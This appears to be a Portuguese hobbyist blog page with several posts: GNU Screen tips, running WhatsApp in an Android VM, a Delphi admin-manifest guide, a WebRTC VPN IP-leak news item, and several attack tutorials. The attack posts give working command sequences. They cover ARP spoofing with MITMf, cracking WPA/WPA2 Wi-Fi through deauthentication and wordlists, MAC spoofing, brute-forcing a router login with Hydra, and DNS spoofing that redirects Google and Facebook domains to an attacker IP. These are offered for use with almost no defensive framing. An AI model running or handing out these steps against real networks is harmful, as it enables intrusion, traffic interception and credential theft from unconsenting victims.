segunda-feira, 3 de agosto de 2015

GNU Screen - Linux Terminal

GNU Screen é um aplicativo de software que pode ser usado para multiplex vários consoles virtuais, permitindo que um usuário para acessar várias sessões de terminal separados dentro de uma única janela de terminal ou sessão de terminal remoto. Ele é útil para lidar com vários programas a partir de uma interface de linha de comando, e para a separação programas a partir da shell do Unix que iniciou o programa. Lançado sob os termos da versão 3 ou posterior do GNU General Public License, GNU tela é um software livre Fonte
Comandos
Ctrl + a " Usar Tudo "Ctrl + a , ? " Wiki nomes de chave comando "Ctrl + a , c " Nova Janela "Ctrl + a , n " Proxima Janela "Ctrl + a , p " Janela Anterior "Ctrl + a , Ctrl + a " Muda de janela para anterior "Ctrl + a , TAB " Move para proxima Região "Ctrl + a , Shift + s " Divide o terminal na Região Horizontal " + Ctrl + a , c "Para criar uma nova janela na região"Ctrl + a , Shift + | " Divide o terminal na Região Vertical " + Ctrl + a , c "Para criar uma nova janela na regiã"Ctrl + a , Shift + a " Seta um nome pra Região "Ctrl + a , :remove "Remove uma Regiao"Ctrl + a , Shift + q "Fecha as Regiões mais mantem as janelas abertas." Obs voce usar exit pra fechar todas um por umexit para sair das janelas e fechar o screen

English
Ctrl + a " Use All "Ctrl + a , ? " Wiki - how key bindings/command names "Ctrl + a , c " New window "Ctrl + a , n " Next window "Ctrl + a , p " Previous window "Ctrl + a , Ctrl + a "Previous window viewed"Ctrl + a , TAB "Move to next region"Ctrl + a , Shift + s " Split terminal horizontally into regions " + Use: Ctrl + a , c to create new window thereCtrl + a , Shift + | " Split terminal vertically into regions" + Use: Ctrl + a , c to create new window thereCtrl + a , Shift + a " Set window title "Ctrl + a , :remove " Remove region"Ctrl + a , Shift + q " Exit all region"exit for quit

.screenrc <source>

# as duas linhas seguintes dar um status de duas linhas, com a janela atual em destaque
hardstatus alwayslastline
hardstatus string '%{= kG}[%{G}%H%? %1`%?%{g}][%= %{= kw}%-w%{+b yk} %n*%t%?(%u)%? %{-}%+w %=%{g}][%{B}%m/%d %{W}%C%A%{g}]'

# buffer de rolamento enorme
defscrollback 5000
# Remove menssage de boas-vindas
startup_message off
# 256 cores
attrcolor b ".I"
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
defbce on

# Permite mudar o foco região clicando com o mouse
mousetrack on
# navegar regiões com Ctrl-setas - | -
bindkey "^[[1;5D" focus left
bindkey "^[[1;5C" focus right
bindkey "^[[1;5A" focus up
bindkey "^[[1;5B" focus down

# alternar rapidamente entre regiões, utilizando guia e setas
bind -c rsz \t eval "focus" "command -c rsz" # Tab
bind -c rsz -k kl eval "focus left" "command -c rsz" # Left
bind -c rsz -k kr eval "focus right" "command -c rsz" # Right
bind -c rsz -k ku eval "focus up" "command -c rsz" # Up
bind -c rsz -k kd eval "focus down" "command -c rsz" # Down


<source> Download Aqui

Referencia:
http://www.pixelbeat.org/lkdb/screen.html

Video

GNU Screen - Linux Terminal from Mathew Thomas on Vimeo.








Read More

quinta-feira, 30 de julho de 2015

MITMf Framework Man-In-The-Middle attacks

O que é um Ataque Man-in-The-Middle

" OBS.. Post Em Edição... "


O man-in-the-middle (pt: Homem no meio, em referência ao atacante que intercepta os dados) é uma forma de ataque em que os dados trocados entre duas partes, por exemplo você e o seu banco, são de alguma forma interceptados, registrados e possivelmente alterados pelo atacante sem que as vitimas se apercebam. Fonte

MITMf é um Framework para ataques Man-In-The-Middle
Esta é uma ferramenta baseada python com vários plugins que adicionam mais funcionalidade (e flexibilidade) à sua rotina de testes de penetração e, assim, torná-lo mais rápido e mais produtivo

Plugins disponíveis:
Spoof  Redirect traffic using ARP Spoofing, DNS Spoofing or ICMP Redirects
BeEFAutorun  Autoruns BeEF modules based on clients OS or browser type
AppCachePoison  Perform app cache poison attacks
BrowserProfiler  Attempts to enumerate all browser plugins of connected clients
CacheKill  Kills page caching by modifying headers
FilePwn  Backdoor executables being sent over http using bdfactory
Inject  Inject arbitrary content into HTML content
JavaPwn  Performs drive-by attacks on clients with out-of-date java browser plugins
jskeylogger  Injects a javascript keylogger into clients webpages
Replace  Replace arbitary content in HTML content
SMBAuth  Evoke SMB challenge-response auth attempts
Upsidedownternet  Flips images 180 degrees
Referência Aqui;

                                      Source && Download
                                          mitmf download
Command:
:~# apt-get update && apt-get install mitmf

Command Basic
:~#  mitmf --spoof --arp --interface eth0 --target 192.168.1.6 --gateway 192.168.1.1

                                   " OBS.. Post Em Edição... "

--interface = Interface de rede eth0/eth1 ou wlan0/wlan1
--target     = Alvo que você deseja spofar
--gateway =  Ip do roteador q você o alvo estao conectados
 

Video:

MITMf Framework Man-In-The-Middle attacks from Mathew Thomas on Vimeo.

Read More

domingo, 5 de julho de 2015

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Password Hydra

" Quebrando Senha de Rede Wi-Fi WPA/WPA2 "
" Clonar Mac "
" Quebrando Senha HTTP Modem "
Step 1
$ airmon-ng
Step 2
$ airmon-ng start wlan1
Step 3
$ airodump-ng mon0
Comando "airodump-ng mon0" Salve em um bloco de notas o: BSSID, CHANEL, ESSID.
BSSID = 00:00:00:00:00:00
CH = 00
ESSID = Wiless_Name
Step 4
$ airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0
O Comando "airodump-ng --bssid 00:00:00:00:00:00 -w handhash -c 00 mon0" Salve alguma estacao.
STATION = 00:00:00:00:00:01
Step 5
$ aireplay-ng -0 0 -a 00:00:00:00:00:00 -e Wiless_Name --ignore-negative-one mon0
Step 6
$ aircrack-ng handhash-01.cap -w /usr/share/dirb/wordlists/big.txt 
Trocando o Mac
Step 7
$ ifconfig wlan1 down
$ macchanger --mac 64:89:9A:18:28:03 wlan0
YOUR MAC: 00:00:00:00:00:02 (Name)
Save your mac on Notepad
Step 8
$ ifconfig wlan0 up
Cracking Modem password
Step 9
hydra -l admin -P /usr/share/dirb/wordlists/big.txt -e ns -t 10 -s -vV 192.168.0.1 http-get
Video:

Quebrando Senha de Rede Wi-Fi WPA/WPA2 + MacChanger + Crack HTTP Hydra from Mathew Thomas on Vimeo.


Read More

quarta-feira, 1 de julho de 2015

Kali Linux DNS Spoofing

Awe pessoal hoje vou falar um pouco sobre DNS Spoof;

O que é DNS Spoof?


DNS Spoof é uma técnica em que os hackers usa para redireciona um sites  que as vítimas querem acessar.
A maioria das pessoas que usam páginas fakes fazem isso.

Falsificação de DNS (ou cache DNS envenenamento) é um computador de hackers ataque, segundo o qual os dados são introduzidos em um Domain Name System (DNS) resolver 's de cache , fazendo com que o servidor de nomes para retornar um incorreto endereço IP , desviando o tráfego para o
computador do atacante (ou qualquer outro computador). Fonte: Wikepedia


Comando:

$ echo "1" >> /proc/sys/net/ipv4/ip_forward


$ arpspoof -i wlan0 192.168.0.1

Creie uma Lista ex:

66.135.216.190 *.google.com
66.135.216.190 mail.live.com
66.135.216.190 br.msn.com
66.135.216.190 m.facebook.com
66.135.216.190 www.facebook.com
66.135.216.190 pt-br.facebook.com


$ dnsspoof -i wlan0 -f lista

Video:

Kali Linux DNS Spoofing from Mathew Thomas on Vimeo.

Read More

sábado, 20 de junho de 2015

Como usar o WhatsApp no Computador


Fala Galera do youtube
Aqui é o mathew, e hoje vou aborda um assunto diferente, pra aqueles que curtem pc mais querem ter um WhatsApp nele



Pode ser em:
Sistema Operacional
  Windows
  Linux
  Mac

Requesitos

  VirtualBox    
    -> Download
    -> VMWare não testei
        
   Android-x86   
    -> Download
    -> Baixem essa versao android-x86-4.4-RC2.iso
        
   2 Mouses  
      1 Para seu Host Hospedeiro
      1 Para seu Android
               
   WhatsApp.apk 
     -> Download
       
   Numero telefone
     -> oi, vivo, tim, claro
        Obs: O numero deve esta em um celular comum, para q
        vc possa receber a ligação com o code de confimação
        do whats, insira o code quando vc receber e pronto pode usar o whats normalmente
Faça o Download dos arquivos nescessarios

Instalações

       ¹ Maquina Virtual -> Você ja deve saber disso
       ² Android-x86 ->  Link do Video
       ³ Whatsapp.apk
          -> Obs: O numero deve esta em um celular comum, para q
          -> vc possa receber a ligação com o code de confimação
          -> do whats, insira o code quando vc receber e pronto pode usar o whats normalmente
      
Extras
Galeria de Fotos, nao abre pelo menos pra mim
 -> Pra poder colocar foto no whatsapp instale o cymera e quando for altera a foto abra com o cymera na opção

Reprodutor de Video, da uns legs

Teclado ingles internacional, acentuasções não funciona

Video

Como usar o WhatsApp no Computador from Mathew Thomas on Vimeo.





Read More

segunda-feira, 1 de junho de 2015

Delphi XE7: Executando Automaticamente Aplicação com Privilégios de Administrador

Olá Pessoal,
Neste poste irei mostra como você podem está configurando suas aplicações para ser executada automaticamente com privilégios de administrador, tendo permissão, por exemplo, para alterar o registro do Windows ou enviar alguma coisa para a System32.

Passo 1:
Criando  UAC.manifest
Abra o seu editor de texto de sua preferência, e insira os seguintes códigos XML:
<assembly manifestversion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
  <assemblyidentity name="NOME-DO-SEU-PROJETO.exe" processorarchitecture="*" type="win32" version="3.1.0.0">
  <dependency>
    <dependentassembly>
      <assemblyidentity language="*" name="Microsoft.Windows.Common-Controls" processorarchitecture="*" publickeytoken="6595b64144ccf1df" type="win32" version="6.0.0.0">
    </assemblyidentity></dependentassembly>
  </dependency>
  <trustinfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedprivileges>
        <requestedexecutionlevel level="requireAdministrator" uiaccess="false">
        </requestedexecutionlevel></requestedprivileges>
    </security>
  </trustinfo>
  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
    <application>
      <!--The ID below indicates application support for Windows Vista -->
      <supportedos id="{e2011457-1546-43c5-a5fe-008deee3d3f0}">
      <!--The ID below indicates application support for Windows 7 -->
      <supportedos id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}">
    </supportedos></supportedos></application>
  </compatibility>
</assemblyidentity></assembly>
Na terceira linha substitua o nome do NOME-DO-SEU-PROJETO.exe pelo nome do Seu-Projeto.exe. Clique em Save As (Salvar Como) e atribua o seguinte nome "UAC.manifest". O arquivo deve ser salvo no mesmo diretório do executável.
















Passo 2:
Criando o UAC.rc
Abra o seu Editor de texto e cole esse código:

1 24 "UAC.manifest"















Clique em Save As (Salvar Como) e atribua o seguinte nome "UAC.rc". Salve, também, este arquivo no mesmo diretório do executável.
















Passo3:
Agora, vamos adicionar este último arquivo ao nosso projeto. No Menu principal do Delphi vá até Project --> Add to Project e selecione o arquivo "UAC.rc".


 
Na TreeView do Project Manager deverá aparecer o arquivo adicionado conforme figura abaixo:
Compile a aplicação. Após o fim da compilação vá até o diretório do executável e verifique se foi criado o arquivo UAC.RES.

















Esse arquivo deve ser usado como opção de inicialização do sistema e é através dele que serão dados os privilégios de rodar como administrador automaticamente. Quando compilamos uma aplicação, ela automaticamente gera um arquivo SeuProjeto.RES que será usado como Manifest inicial. O que iremos fazer é substituir esse arquivo pelo nosso manifest.

Passo 4:
Assim sendo, vá até o Menu Project | Options | Application e onde estiver marcada a opção "Enable RunTime Themes" substitua por "Use Custom Manifest". Logo abaixo aparecerá uma opção para que você selecione o arquivo manifest que deseja utilizar. Selecione o arquivo "UAC.manifest" criado e execute sua aplicação.





































Icone do aplicativo antes:















Icone Depois:














Bom Pessoal é isso, ate a Proxima com mais Delphi XE7

Video Abaixo:


Read More

quinta-feira, 26 de fevereiro de 2015

WeRTC Javascript Bypass Tor vpn


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que sites podem ter acesso facilmente a seus endereços de IP através WebRTC.

A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.

Revelações feitas pelo Snowden, deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós vimos que o Governo canadense rastreia visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionado.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas possam verificar se são afetados pela falha de segurança.

DEMO: github.com/diafygi/webrtc-ips
TESTE AQUI: diafygi.github.io/webrtc-ips

Tutorial Completo Aqui
 
Read More